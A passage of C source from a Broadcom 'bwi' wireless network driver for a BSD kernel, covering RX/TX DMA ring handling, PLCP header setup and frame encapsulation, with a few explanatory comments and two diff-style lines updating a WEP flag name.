EOPNOTSUPP; } static void bwi_setup_rx_desc64(struct bwi_softc *sc, int buf_idx, bus_addr_t paddr, int buf_len) { /* TODO:64 */ } static void bwi_setup_tx_desc64(struct bwi_softc *sc, struct bwi_ring_data *rd, int buf_idx, bus_addr_t paddr, int buf_len) { /* TODO:64 */ } static void bwi_dma_buf_addr(void *arg, bus_dma_segment_t *seg, int nseg, bus_size_t mapsz __unused, int error) { if (!error) { KASSERT(nseg == 1, ("too many segments(%d)\n", nseg)); *((bus_addr_t *)arg) = seg->ds_addr; } } static int bwi_newbuf(struct bwi_softc *sc, int buf_idx, int init) { struct bwi_rxbuf_data *rbd = &sc->sc_rx_bdata; struct bwi_rxbuf *rxbuf = &rbd->rbd_buf[buf_idx]; struct bwi_rxbuf_hdr *hdr; bus_dmamap_t map; bus_addr_t paddr; struct mbuf *m; int error; KASSERT(buf_idx < BWI_RX_NDESC, ("buf_idx %d", buf_idx)); m = m_getcl(M_NOWAIT, MT_DATA, M_PKTHDR); if (m == NULL) { error = ENOBUFS; /* * If the NIC is up and running, we need to: * - Clear RX buffer's header. * - Restore RX descriptor settings. 
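                 * (i.e. on an allocation failure after the ring is live we
                 * keep the old mbuf in this slot and fall through to
                 * "back:", which re-zeroes its bwi_rxbuf_hdr and re-programs
                 * the descriptor, so the RX ring never ends up with an
                 * unarmed entry.  During initial ring setup -- init != 0 --
                 * there is nothing to recycle and the error is simply
                 * returned to bwi_init_rx_ring32().)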
*/ if (init) return error; else goto back; } m->m_len = m->m_pkthdr.len = MCLBYTES; /* * Try to load RX buf into temporary DMA map */ error = bus_dmamap_load_mbuf(sc->sc_buf_dtag, rbd->rbd_tmp_dmap, m, bwi_dma_buf_addr, &paddr, BUS_DMA_NOWAIT); if (error) { m_freem(m); /* * See the comment above */ if (init) return error; else goto back; } if (!init) bus_dmamap_unload(sc->sc_buf_dtag, rxbuf->rb_dmap); rxbuf->rb_mbuf = m; rxbuf->rb_paddr = paddr; /* * Swap RX buf's DMA map with the loaded temporary one */ map = rxbuf->rb_dmap; rxbuf->rb_dmap = rbd->rbd_tmp_dmap; rbd->rbd_tmp_dmap = map; back: /* * Clear RX buf header */ hdr = mtod(rxbuf->rb_mbuf, struct bwi_rxbuf_hdr *); bzero(hdr, sizeof(*hdr)); bus_dmamap_sync(sc->sc_buf_dtag, rxbuf->rb_dmap, BUS_DMASYNC_PREWRITE); /* * Setup RX buf descriptor */ sc->sc_setup_rxdesc(sc, buf_idx, rxbuf->rb_paddr, rxbuf->rb_mbuf->m_len - sizeof(*hdr)); return error; } static void bwi_set_addr_filter(struct bwi_softc *sc, uint16_t addr_ofs, const uint8_t *addr) { int i; CSR_WRITE_2(sc, BWI_ADDR_FILTER_CTRL, BWI_ADDR_FILTER_CTRL_SET | addr_ofs); for (i = 0; i < (IEEE80211_ADDR_LEN / 2); ++i) { uint16_t addr_val; addr_val = (uint16_t)addr[i * 2] | (((uint16_t)addr[(i * 2) + 1]) << 8); CSR_WRITE_2(sc, BWI_ADDR_FILTER_DATA, addr_val); } } static int bwi_rxeof(struct bwi_softc *sc, int end_idx) { struct bwi_ring_data *rd = &sc->sc_rx_rdata; struct bwi_rxbuf_data *rbd = &sc->sc_rx_bdata; struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; int idx, rx_data = 0; idx = rbd->rbd_idx; while (idx != end_idx) { struct bwi_rxbuf *rb = &rbd->rbd_buf[idx]; struct bwi_rxbuf_hdr *hdr; struct ieee80211_frame_min *wh; struct ieee80211_node *ni; struct mbuf *m; uint32_t plcp; uint16_t flags2; int buflen, wh_ofs, hdr_extra, rssi, noise, type, rate; m = rb->rb_mbuf; bus_dmamap_sync(sc->sc_buf_dtag, rb->rb_dmap, BUS_DMASYNC_POSTREAD); if (bwi_newbuf(sc, idx, 0)) { ifp->if_ierrors++; goto next; } hdr = mtod(m, struct bwi_rxbuf_hdr *); flags2 = le16toh(hdr->rxh_flags2); hdr_extra = 0; if (flags2 & BWI_RXH_F2_TYPE2FRAME) hdr_extra = 2; wh_ofs = hdr_extra + 6; /* XXX magic number */ buflen = le16toh(hdr->rxh_buflen); if (buflen < BWI_FRAME_MIN_LEN(wh_ofs)) { if_printf(ifp, "%s: zero length data, hdr_extra %d\n", __func__, hdr_extra); ifp->if_ierrors++; m_freem(m); goto next; } bcopy((uint8_t *)(hdr + 1) + hdr_extra, &plcp, sizeof(plcp)); rssi = bwi_calc_rssi(sc, hdr); noise = bwi_calc_noise(sc); m->m_pkthdr.rcvif = ifp; m->m_len = m->m_pkthdr.len = buflen + sizeof(*hdr); m_adj(m, sizeof(*hdr) + wh_ofs); if (htole16(hdr->rxh_flags1) & BWI_RXH_F1_OFDM) rate = bwi_plcp2rate(plcp, IEEE80211_T_OFDM); else rate = bwi_plcp2rate(plcp, IEEE80211_T_CCK); /* RX radio tap */ if (ieee80211_radiotap_active(ic)) bwi_rx_radiotap(sc, m, hdr, &plcp, rate, rssi, noise); m_adj(m, -IEEE80211_CRC_LEN); BWI_UNLOCK(sc); wh = mtod(m, struct ieee80211_frame_min *); ni = ieee80211_find_rxnode(ic, wh); if (ni != NULL) { type = ieee80211_input(ni, m, rssi - noise, noise); ieee80211_free_node(ni); } else type = ieee80211_input_all(ic, m, rssi - noise, noise); if (type == IEEE80211_FC0_TYPE_DATA) { rx_data = 1; sc->sc_rx_rate = rate; } BWI_LOCK(sc); next: idx = (idx + 1) % BWI_RX_NDESC; if (sc->sc_flags & BWI_F_STOP) { /* * Take the fast lane, don't do * any damage to softc */ return -1; } } rbd->rbd_idx = idx; bus_dmamap_sync(sc->sc_rxring_dtag, rd->rdata_dmap, BUS_DMASYNC_PREWRITE); return rx_data; } static int bwi_rxeof32(struct bwi_softc *sc) { uint32_t val, rx_ctrl; int end_idx, rx_data; 
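        /*
         * RX completion is an index handshake: BWI_RX32_STATUS reports, as
         * a byte offset, how far the DMA engine has advanced, bwi_rxeof()
         * consumes buffers up to that index, and the same offset is then
         * written to BWI_RX32_INDEX to hand the descriptors back.  With
         * sizeof(struct bwi_desc32) == 8, for example, a status offset of
         * 0x40 yields end_idx 8, i.e. descriptors 0-7 are ready when
         * rbd_idx started at 0.  bwi_rxeof() drops the driver lock around
         * ieee80211_input() and returns -1 if the interface was stopped in
         * the meantime (see its "Take the fast lane" comment); the index
         * write-back is skipped in that case.
         */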
rx_ctrl = sc->sc_rx_rdata.rdata_txrx_ctrl; val = CSR_READ_4(sc, rx_ctrl + BWI_RX32_STATUS); end_idx = __SHIFTOUT(val, BWI_RX32_STATUS_INDEX_MASK) / sizeof(struct bwi_desc32); rx_data = bwi_rxeof(sc, end_idx); if (rx_data >= 0) { CSR_WRITE_4(sc, rx_ctrl + BWI_RX32_INDEX, end_idx * sizeof(struct bwi_desc32)); } return rx_data; } static int bwi_rxeof64(struct bwi_softc *sc) { /* TODO:64 */ return 0; } static void bwi_reset_rx_ring32(struct bwi_softc *sc, uint32_t rx_ctrl) { int i; CSR_WRITE_4(sc, rx_ctrl + BWI_RX32_CTRL, 0); #define NRETRY 10 for (i = 0; i < NRETRY; ++i) { uint32_t status; status = CSR_READ_4(sc, rx_ctrl + BWI_RX32_STATUS); if (__SHIFTOUT(status, BWI_RX32_STATUS_STATE_MASK) == BWI_RX32_STATUS_STATE_DISABLED) break; DELAY(1000); } if (i == NRETRY) device_printf(sc->sc_dev, "reset rx ring timedout\n"); #undef NRETRY CSR_WRITE_4(sc, rx_ctrl + BWI_RX32_RINGINFO, 0); } static void bwi_free_txstats32(struct bwi_softc *sc) { bwi_reset_rx_ring32(sc, sc->sc_txstats->stats_ctrl_base); } static void bwi_free_rx_ring32(struct bwi_softc *sc) { struct bwi_ring_data *rd = &sc->sc_rx_rdata; struct bwi_rxbuf_data *rbd = &sc->sc_rx_bdata; int i; bwi_reset_rx_ring32(sc, rd->rdata_txrx_ctrl); for (i = 0; i < BWI_RX_NDESC; ++i) { struct bwi_rxbuf *rb = &rbd->rbd_buf[i]; if (rb->rb_mbuf != NULL) { bus_dmamap_unload(sc->sc_buf_dtag, rb->rb_dmap); m_freem(rb->rb_mbuf); rb->rb_mbuf = NULL; } } } static void bwi_free_tx_ring32(struct bwi_softc *sc, int ring_idx) { struct bwi_ring_data *rd; struct bwi_txbuf_data *tbd; struct ifnet *ifp = sc->sc_ifp; uint32_t state, val; int i; KASSERT(ring_idx < BWI_TX_NRING, ("ring_idx %d", ring_idx)); rd = &sc->sc_tx_rdata[ring_idx]; tbd = &sc->sc_tx_bdata[ring_idx]; #define NRETRY 10 for (i = 0; i < NRETRY; ++i) { val = CSR_READ_4(sc, rd->rdata_txrx_ctrl + BWI_TX32_STATUS); state = __SHIFTOUT(val, BWI_TX32_STATUS_STATE_MASK); if (state == BWI_TX32_STATUS_STATE_DISABLED || state == BWI_TX32_STATUS_STATE_IDLE || state == BWI_TX32_STATUS_STATE_STOPPED) break; DELAY(1000); } if (i == NRETRY) { if_printf(ifp, "%s: wait for TX ring(%d) stable timed out\n", __func__, ring_idx); } CSR_WRITE_4(sc, rd->rdata_txrx_ctrl + BWI_TX32_CTRL, 0); for (i = 0; i < NRETRY; ++i) { val = CSR_READ_4(sc, rd->rdata_txrx_ctrl + BWI_TX32_STATUS); state = __SHIFTOUT(val, BWI_TX32_STATUS_STATE_MASK); if (state == BWI_TX32_STATUS_STATE_DISABLED) break; DELAY(1000); } if (i == NRETRY) if_printf(ifp, "%s: reset TX ring (%d) timed out\n", __func__, ring_idx); #undef NRETRY DELAY(1000); CSR_WRITE_4(sc, rd->rdata_txrx_ctrl + BWI_TX32_RINGINFO, 0); for (i = 0; i < BWI_TX_NDESC; ++i) { struct bwi_txbuf *tb = &tbd->tbd_buf[i]; if (tb->tb_mbuf != NULL) { bus_dmamap_unload(sc->sc_buf_dtag, tb->tb_dmap); m_freem(tb->tb_mbuf); tb->tb_mbuf = NULL; } if (tb->tb_ni != NULL) { ieee80211_free_node(tb->tb_ni); tb->tb_ni = NULL; } } } static void bwi_free_txstats64(struct bwi_softc *sc) { /* TODO:64 */ } static void bwi_free_rx_ring64(struct bwi_softc *sc) { /* TODO:64 */ } static void bwi_free_tx_ring64(struct bwi_softc *sc, int ring_idx) { /* TODO:64 */ } /* XXX does not belong here */ #define IEEE80211_OFDM_PLCP_RATE_MASK __BITS(3, 0) #define IEEE80211_OFDM_PLCP_LEN_MASK __BITS(16, 5) static __inline void bwi_ofdm_plcp_header(uint32_t *plcp0, int pkt_len, uint8_t rate) { uint32_t plcp; plcp = __SHIFTIN(ieee80211_rate2plcp(rate, IEEE80211_T_OFDM), IEEE80211_OFDM_PLCP_RATE_MASK) | __SHIFTIN(pkt_len, IEEE80211_OFDM_PLCP_LEN_MASK); *plcp0 = htole32(plcp); } static __inline void bwi_ds_plcp_header(struct 
ieee80211_ds_plcp_hdr *plcp, int pkt_len, uint8_t rate) { int len, service, pkt_bitlen; pkt_bitlen = pkt_len * NBBY; len = howmany(pkt_bitlen * 2, rate); service = IEEE80211_PLCP_SERVICE_LOCKED; if (rate == (11 * 2)) { int pkt_bitlen1; /* * PLCP service field needs to be adjusted, * if TX rate is 11Mbits/s */ pkt_bitlen1 = len * 11; if (pkt_bitlen1 - pkt_bitlen >= NBBY) service |= IEEE80211_PLCP_SERVICE_LENEXT7; } plcp->i_signal = ieee80211_rate2plcp(rate, IEEE80211_T_CCK); plcp->i_service = service; plcp->i_length = htole16(len); /* NOTE: do NOT touch i_crc */ } static __inline void bwi_plcp_header(const struct ieee80211_rate_table *rt, void *plcp, int pkt_len, uint8_t rate) { enum ieee80211_phytype modtype; /* * Assume caller has zeroed 'plcp' */ modtype = ieee80211_rate2phytype(rt, rate); if (modtype == IEEE80211_T_OFDM) bwi_ofdm_plcp_header(plcp, pkt_len, rate); else if (modtype == IEEE80211_T_DS) bwi_ds_plcp_header(plcp, pkt_len, rate); else panic("unsupported modulation type %u\n", modtype); } static int bwi_encap(struct bwi_softc *sc, int idx, struct mbuf *m, struct ieee80211_node *ni) { struct ieee80211vap *vap = ni->ni_vap; struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; struct bwi_ring_data *rd = &sc->sc_tx_rdata[BWI_TX_DATA_RING]; struct bwi_txbuf_data *tbd = &sc->sc_tx_bdata[BWI_TX_DATA_RING]; struct bwi_txbuf *tb = &tbd->tbd_buf[idx]; struct bwi_mac *mac; struct bwi_txbuf_hdr *hdr; struct ieee80211_frame *wh; const struct ieee80211_txparam *tp; uint8_t rate, rate_fb; uint32_t mac_ctrl; uint16_t phy_ctrl; bus_addr_t paddr; int type, ismcast, pkt_len, error, rix; #if 0 const uint8_t *p; int i; #endif KASSERT(sc->sc_cur_regwin->rw_type == BWI_REGWIN_T_MAC, ("current regwin type %d", sc->sc_cur_regwin->rw_type)); mac = (struct bwi_mac *)sc->sc_cur_regwin; wh = mtod(m, struct ieee80211_frame *); type = wh->i_fc[0] & IEEE80211_FC0_TYPE_MASK; ismcast = IEEE80211_IS_MULTICAST(wh->i_addr1); /* Get 802.11 frame len before prepending TX header */ pkt_len = m->m_pkthdr.len + IEEE80211_CRC_LEN; /* * Find TX rate */ tp = &vap->iv_txparms[ieee80211_chan2mode(ic->ic_curchan)]; if (type != IEEE80211_FC0_TYPE_DATA || (m->m_flags & M_EAPOL)) { rate = rate_fb = tp->mgmtrate; } else if (ismcast) { rate = rate_fb = tp->mcastrate; } else if (tp->ucastrate != IEEE80211_FIXED_RATE_NONE) { rate = rate_fb = tp->ucastrate; } else { rix = ieee80211_ratectl_rate(ni, NULL, pkt_len); rate = ni->ni_txrate; if (rix > 0) { rate_fb = ni->ni_rates.rs_rates[rix-1] & IEEE80211_RATE_VAL; } else { rate_fb = rate; } } tb->tb_rate[0] = rate; tb->tb_rate[1] = rate_fb; sc->sc_tx_rate = rate; /* * TX radio tap */ if (ieee80211_radiotap_active_vap(vap)) { sc->sc_tx_th.wt_flags = 0; - if (wh->i_fc[1] & IEEE80211_FC1_WEP) + if (wh->i_fc[1] & IEEE80211_FC1_PROTECTED) sc->sc_tx_th.wt_flags |= IEEE80211_RADIOTAP_F_WEP; if (ieee80211_rate2phytype(sc->sc_rates, rate) == IEEE80211_T_DS && (ic->ic_flags & IEEE80211_F_SHPREAMBLE) && rate != (1 * 2)) { sc->sc_tx_th.wt_flags |= IEEE80211_RADIOTAP_F_SHORTPRE; } sc->sc_tx_th.wt_rate = rate; ieee80211_radiotap_tx(vap, m); } /* * Setup the embedded TX header */ M_PREPEND(m, sizeof(*hdr), M_NOWAIT); if (m == NULL) { if_printf(ifp, "%s: prepend TX header failed\n", __func__); return ENOBUFS; } hdr = mtod(m, struct bwi_txbuf_hdr *); bzero(hdr, sizeof(*hdr)); bcopy(wh->i_fc, hdr->txh_fc, sizeof(hdr->txh_fc)); bcopy(wh->i_addr1, hdr->txh_addr1, sizeof(hdr->txh_addr1)); if (!ismcast) { uint16_t dur; dur = ieee80211_ack_duration(sc->sc_rates, rate, ic->ic_flags &
~IEEE80211_F_SHPREAMBLE); hdr->txh_fb_duration = htole16(dur); } hdr->txh_id = __SHIFTIN(BWI_TX_DATA_RING, BWI_TXH_ID_RING_MASK) | __SHIFTIN(idx, BWI_TXH_ID_IDX_MASK); bwi_plcp_header(sc->sc_rates, hdr->txh_plcp, pkt_len, rate); bwi_plcp_header(sc->sc_rates, hdr->txh_fb_plcp, pkt_len, rate_fb); phy_ctrl = __SHIFTIN(mac->mac_rf.rf_ant_mode, BWI_TXH_PHY_C_ANTMODE_MASK); if (ieee80211_rate2phytype(sc->sc_rates, rate) == IEEE80211_T_OFDM) phy_ctrl |= BWI_TXH_PHY_C_OFDM; else if ((ic->ic_flags & IEEE80211_F_SHPREAMBLE) && rate != (2 * 1)) phy_ctrl |= BWI_TXH_PHY_C_SHPREAMBLE; mac_ctrl = BWI_TXH_MAC_C_HWSEQ | BWI_TXH_MAC_C_FIRST_FRAG; if (!ismcast) mac_ctrl |= BWI_TXH_MAC_C_ACK; if (ieee80211_rate2phytype(sc->sc_rates, rate_fb) == IEEE80211_T_OFDM) mac_ctrl |= BWI_TXH_MAC_C_FB_OFDM; hdr->txh_mac_ctrl = htole32(mac_ctrl); hdr->txh_phy_ctrl = htole16(phy_ctrl); /* Catch any further usage */ hdr = NULL; wh = NULL; /* DMA load */ error = bus_dmamap_load_mbuf(sc->sc_buf_dtag, tb->tb_dmap, m, bwi_dma_buf_addr, &paddr, BUS_DMA_NOWAIT); if (error && error != EFBIG) { if_printf(ifp, "%s: can't load TX buffer (1) %d\n", __func__, error); goto back; } if (error) { /* error == EFBIG */ struct mbuf *m_new; m_new = m_defrag(m, M_NOWAIT); if (m_new == NULL) { if_printf(ifp, "%s: can't defrag TX buffer\n", __func__); error = ENOBUFS; goto back; } else { m = m_new; } error = bus_dmamap_load_mbuf(sc->sc_buf_dtag, tb->tb_dmap, m, bwi_dma_buf_addr, &paddr, BUS_DMA_NOWAIT); if (error) { if_printf(ifp, "%s: can't load TX buffer (2) %d\n", __func__, error); goto back; } } error = 0; bus_dmamap_sync(sc->sc_buf_dtag, tb->tb_dmap, BUS_DMASYNC_PREWRITE); tb->tb_mbuf = m; tb->tb_ni = ni; #if 0 p = mtod(m, const uint8_t *); for (i = 0; i < m->m_pkthdr.len; ++i) { if (i != 0 && i % 8 == 0) printf("\n"); printf("%02x ", p[i]); } printf("\n"); #endif DPRINTF(sc, BWI_DBG_TX, "idx %d, pkt_len %d, buflen %d\n", idx, pkt_len, m->m_pkthdr.len); /* Setup TX descriptor */ sc->sc_setup_txdesc(sc, rd, idx, paddr, m->m_pkthdr.len); bus_dmamap_sync(sc->sc_txring_dtag, rd->rdata_dmap, BUS_DMASYNC_PREWRITE); /* Kick start */ sc->sc_start_tx(sc, rd->rdata_txrx_ctrl, idx); back: if (error) m_freem(m); return error; } static int bwi_encap_raw(struct bwi_softc *sc, int idx, struct mbuf *m, struct ieee80211_node *ni, const struct ieee80211_bpf_params *params) { struct ifnet *ifp = sc->sc_ifp; struct ieee80211vap *vap = ni->ni_vap; struct ieee80211com *ic = ni->ni_ic; struct bwi_ring_data *rd = &sc->sc_tx_rdata[BWI_TX_DATA_RING]; struct bwi_txbuf_data *tbd = &sc->sc_tx_bdata[BWI_TX_DATA_RING]; struct bwi_txbuf *tb = &tbd->tbd_buf[idx]; struct bwi_mac *mac; struct bwi_txbuf_hdr *hdr; struct ieee80211_frame *wh; uint8_t rate, rate_fb; uint32_t mac_ctrl; uint16_t phy_ctrl; bus_addr_t paddr; int ismcast, pkt_len, error; KASSERT(sc->sc_cur_regwin->rw_type == BWI_REGWIN_T_MAC, ("current regwin type %d", sc->sc_cur_regwin->rw_type)); mac = (struct bwi_mac *)sc->sc_cur_regwin; wh = mtod(m, struct ieee80211_frame *); ismcast = IEEE80211_IS_MULTICAST(wh->i_addr1); /* Get 802.11 frame len before prepending TX header */ pkt_len = m->m_pkthdr.len + IEEE80211_CRC_LEN; /* * Find TX rate */ rate = params->ibp_rate0; if (!ieee80211_isratevalid(ic->ic_rt, rate)) { /* XXX fall back to mcast/mgmt rate? */ m_freem(m); return EINVAL; } if (params->ibp_try1 != 0) { rate_fb = params->ibp_rate1; if (!ieee80211_isratevalid(ic->ic_rt, rate_fb)) { /* XXX fall back to rate0? 
*/ m_freem(m); return EINVAL; } } else rate_fb = rate; tb->tb_rate[0] = rate; tb->tb_rate[1] = rate_fb; sc->sc_tx_rate = rate; /* * TX radio tap */ if (ieee80211_radiotap_active_vap(vap)) { sc->sc_tx_th.wt_flags = 0; /* XXX IEEE80211_BPF_CRYPTO */ - if (wh->i_fc[1] & IEEE80211_FC1_WEP) + if (wh->i_fc[1] & IEEE80211_FC1_PROTECTED) sc->sc_tx_th.wt_flags |= IEEE80211_RADIOTAP_F_WEP; if (params->ibp_flags & IEEE80211_BPF_SHORTPRE) sc->sc_tx_th.wt_flags |= IEEE80211_RADIOTAP_F_SHORTPRE; sc->sc_tx_th.wt_rate = rate; ieee80211_radiotap_tx(vap, m); } /* * Setup the embedded TX header */ M_PREPEND(m, sizeof(*hdr), M_NOWAIT); if (m == NULL) { if_printf(ifp, "%s: prepend TX header failed\n", __func__); return ENOBUFS; } hdr = mtod(m, struct bwi_txbuf_hdr *); bzero(hdr, sizeof(*hdr)); bcopy(wh->i_fc, hdr->txh_fc, sizeof(hdr->txh_fc)); bcopy(wh->i_addr1, hdr->txh_addr1, sizeof(hdr->txh_addr1)); mac_ctrl = BWI_TXH_MAC_C_HWSEQ | BWI_TXH_MAC_C_FIRST_FRAG; if (!ismcast && (params->ibp_flags & IEEE80211_BPF_NOACK) == 0) { uint16_t dur; dur = ieee80211_ack_duration(sc->sc_rates, rate_fb, 0); hdr->txh_fb_duration = htole16(dur); mac_ctrl |= BWI_TXH_MAC_C_ACK; } hdr->txh_id = __SHIFTIN(BWI_TX_DATA_RING, BWI_TXH_ID_RING_MASK) | __SHIFTIN(idx, BWI_TXH_ID_IDX_MASK); bwi_plcp_header(sc->sc_rates, hdr->txh_plcp, pkt_len, rate); bwi_plcp_header(sc->sc_rates, hdr->txh_fb_plcp, pkt_len, rate_fb); phy_ctrl = __SHIFTIN(mac->mac_rf.rf_ant_mode, BWI_TXH_PHY_C_ANTMODE_MASK); if (ieee80211_rate2phytype(sc->sc_rates, rate) == IEEE80211_T_OFDM) { phy_ctrl |= BWI_TXH_PHY_C_OFDM; mac_ctrl |= BWI_TXH_MAC_C_FB_OFDM; } else if (params->ibp_flags & IEEE80211_BPF_SHORTPRE) phy_ctrl |= BWI_TXH_PHY_C_SHPREAMBLE; hdr->txh_mac_ctrl = htole32(mac_ctrl); hdr->txh_phy_ctrl = htole16(phy_ctrl); /* Catch any further usage */ hdr = NULL; wh = NULL; /* DMA load */ error = bus_dmamap_load_mbuf(sc->sc_buf_dtag, tb->tb_dmap, m, bwi_dma_buf_addr, &paddr, BUS_DMA_NOWAIT); if (error != 0) { struct mbuf *m_new; if (error != EFBIG) { if_printf(ifp, "%s: can't load TX buffer (1) %d\n", __func__, error); goto back; } m_new = m_defrag(m, M_NOWAIT); if (m_new == NULL) { if_printf(ifp, "%s: can't defrag TX buffer\n", __func__); error = ENOBUFS; goto back; } m = m_new; error = bus_dmamap_load_mbuf(sc->sc_buf_dtag, tb->tb_dmap, m, bwi_dma_buf_addr, &paddr, BUS_DMA_NOWAIT); if (error) { if_printf(ifp, "%s: can't load TX buffer (2) %d\n", __func__, error); goto back; } } bus_dmamap_sync(sc->sc_buf_dtag, tb->tb_dmap, BUS_DMASYNC_PREWRITE); tb->tb_mbuf = m; tb->tb_ni = ni; DPRINTF(sc, BWI_DBG_TX, "idx %d, pkt_len %d, buflen %d\n", idx, pkt_len, m->m_pkthdr.len); /* Setup TX descriptor */ sc->sc_setup_txdesc(sc, rd, idx, paddr, m->m_pkthdr.len); bus_dmamap_sync(sc->sc_txring_dtag, rd->rdata_dmap, BUS_DMASYNC_PREWRITE); /* Kick start */ sc->sc_start_tx(sc, rd->rdata_txrx_ctrl, idx); back: if (error) m_freem(m); return error; } static void bwi_start_tx32(struct bwi_softc *sc, uint32_t tx_ctrl, int idx) { idx = (idx + 1) % BWI_TX_NDESC; CSR_WRITE_4(sc, tx_ctrl + BWI_TX32_INDEX, idx * sizeof(struct bwi_desc32)); } static void bwi_start_tx64(struct bwi_softc *sc, uint32_t tx_ctrl, int idx) { /* TODO:64 */ } static void bwi_txeof_status32(struct bwi_softc *sc) { struct ifnet *ifp = sc->sc_ifp; uint32_t val, ctrl_base; int end_idx; ctrl_base = sc->sc_txstats->stats_ctrl_base; val = CSR_READ_4(sc, ctrl_base + BWI_RX32_STATUS); end_idx = __SHIFTOUT(val, BWI_RX32_STATUS_INDEX_MASK) / sizeof(struct bwi_desc32); bwi_txeof_status(sc, end_idx); CSR_WRITE_4(sc, ctrl_base + 
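/*
 * The TX completion path that follows depends on the 16-bit cookie stored
 * in txh_id by bwi_encap()/bwi_encap_raw(): the ring number and the slot
 * index are packed into separate bit fields with __SHIFTIN() and recovered
 * in _bwi_txeof() with __SHIFTOUT().  A minimal model of that round trip
 * (the real field layout is defined by BWI_TXH_ID_RING_MASK and
 * BWI_TXH_ID_IDX_MASK):
 *
 *	id   = __SHIFTIN(ring, BWI_TXH_ID_RING_MASK) |
 *	       __SHIFTIN(idx, BWI_TXH_ID_IDX_MASK);
 *	ring = __SHIFTOUT(id, BWI_TXH_ID_RING_MASK);
 *	idx  = __SHIFTOUT(id, BWI_TXH_ID_IDX_MASK);
 *
 * which is what lets a firmware TX status report be matched back to the
 * bwi_txbuf that carried the frame.
 */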
BWI_RX32_INDEX, end_idx * sizeof(struct bwi_desc32)); if ((ifp->if_drv_flags & IFF_DRV_OACTIVE) == 0) ifp->if_start(ifp); } static void bwi_txeof_status64(struct bwi_softc *sc) { /* TODO:64 */ } static void _bwi_txeof(struct bwi_softc *sc, uint16_t tx_id, int acked, int data_txcnt) { struct ifnet *ifp = sc->sc_ifp; struct bwi_txbuf_data *tbd; struct bwi_txbuf *tb; int ring_idx, buf_idx; struct ieee80211_node *ni; struct ieee80211vap *vap; if (tx_id == 0) { if_printf(ifp, "%s: zero tx id\n", __func__); return; } ring_idx = __SHIFTOUT(tx_id, BWI_TXH_ID_RING_MASK); buf_idx = __SHIFTOUT(tx_id, BWI_TXH_ID_IDX_MASK); KASSERT(ring_idx == BWI_TX_DATA_RING, ("ring_idx %d", ring_idx)); KASSERT(buf_idx < BWI_TX_NDESC, ("buf_idx %d", buf_idx)); tbd = &sc->sc_tx_bdata[ring_idx]; KASSERT(tbd->tbd_used > 0, ("tbd_used %d", tbd->tbd_used)); tbd->tbd_used--; tb = &tbd->tbd_buf[buf_idx]; DPRINTF(sc, BWI_DBG_TXEOF, "txeof idx %d, " "acked %d, data_txcnt %d, ni %p\n", buf_idx, acked, data_txcnt, tb->tb_ni); bus_dmamap_unload(sc->sc_buf_dtag, tb->tb_dmap); ni = tb->tb_ni; if (tb->tb_ni != NULL) { const struct bwi_txbuf_hdr *hdr = mtod(tb->tb_mbuf, const struct bwi_txbuf_hdr *); vap = ni->ni_vap; /* NB: update rate control only for unicast frames */ if (hdr->txh_mac_ctrl & htole32(BWI_TXH_MAC_C_ACK)) { /* * Feed back 'acked and data_txcnt'. Note that the * generic AMRR code only understands one tx rate * and the estimator doesn't handle real retry counts * well so to avoid over-aggressive downshifting we * treat any number of retries as "1". */ ieee80211_ratectl_tx_complete(vap, ni, (data_txcnt > 1) ? IEEE80211_RATECTL_TX_SUCCESS : IEEE80211_RATECTL_TX_FAILURE, &acked, NULL); } /* * Do any tx complete callback. Note this must * be done before releasing the node reference. 
*/ if (tb->tb_mbuf->m_flags & M_TXCB) ieee80211_process_callback(ni, tb->tb_mbuf, !acked); ieee80211_free_node(tb->tb_ni); tb->tb_ni = NULL; } m_freem(tb->tb_mbuf); tb->tb_mbuf = NULL; if (tbd->tbd_used == 0) sc->sc_tx_timer = 0; ifp->if_drv_flags &= ~IFF_DRV_OACTIVE; } static void bwi_txeof_status(struct bwi_softc *sc, int end_idx) { struct bwi_txstats_data *st = sc->sc_txstats; int idx; bus_dmamap_sync(st->stats_dtag, st->stats_dmap, BUS_DMASYNC_POSTREAD); idx = st->stats_idx; while (idx != end_idx) { const struct bwi_txstats *stats = &st->stats[idx]; if ((stats->txs_flags & BWI_TXS_F_PENDING) == 0) { int data_txcnt; data_txcnt = __SHIFTOUT(stats->txs_txcnt, BWI_TXS_TXCNT_DATA); _bwi_txeof(sc, le16toh(stats->txs_id), stats->txs_flags & BWI_TXS_F_ACKED, data_txcnt); } idx = (idx + 1) % BWI_TXSTATS_NDESC; } st->stats_idx = idx; } static void bwi_txeof(struct bwi_softc *sc) { struct ifnet *ifp = sc->sc_ifp; for (;;) { uint32_t tx_status0, tx_status1; uint16_t tx_id; int data_txcnt; tx_status0 = CSR_READ_4(sc, BWI_TXSTATUS0); if ((tx_status0 & BWI_TXSTATUS0_VALID) == 0) break; tx_status1 = CSR_READ_4(sc, BWI_TXSTATUS1); tx_id = __SHIFTOUT(tx_status0, BWI_TXSTATUS0_TXID_MASK); data_txcnt = __SHIFTOUT(tx_status0, BWI_TXSTATUS0_DATA_TXCNT_MASK); if (tx_status0 & (BWI_TXSTATUS0_AMPDU | BWI_TXSTATUS0_PENDING)) continue; _bwi_txeof(sc, le16toh(tx_id), tx_status0 & BWI_TXSTATUS0_ACKED, data_txcnt); } if ((ifp->if_drv_flags & IFF_DRV_OACTIVE) == 0) ifp->if_start(ifp); } static int bwi_bbp_power_on(struct bwi_softc *sc, enum bwi_clock_mode clk_mode) { bwi_power_on(sc, 1); return bwi_set_clock_mode(sc, clk_mode); } static void bwi_bbp_power_off(struct bwi_softc *sc) { bwi_set_clock_mode(sc, BWI_CLOCK_MODE_SLOW); bwi_power_off(sc, 1); } static int bwi_get_pwron_delay(struct bwi_softc *sc) { struct bwi_regwin *com, *old; struct bwi_clock_freq freq; uint32_t val; int error; com = &sc->sc_com_regwin; KASSERT(BWI_REGWIN_EXIST(com), ("no regwin")); if ((sc->sc_cap & BWI_CAP_CLKMODE) == 0) return 0; error = bwi_regwin_switch(sc, com, &old); if (error) return error; bwi_get_clock_freq(sc, &freq); val = CSR_READ_4(sc, BWI_PLL_ON_DELAY); sc->sc_pwron_delay = howmany((val + 2) * 1000000, freq.clkfreq_min); DPRINTF(sc, BWI_DBG_ATTACH, "power on delay %u\n", sc->sc_pwron_delay); return bwi_regwin_switch(sc, old, NULL); } static int bwi_bus_attach(struct bwi_softc *sc) { struct bwi_regwin *bus, *old; int error; bus = &sc->sc_bus_regwin; error = bwi_regwin_switch(sc, bus, &old); if (error) return error; if (!bwi_regwin_is_enabled(sc, bus)) 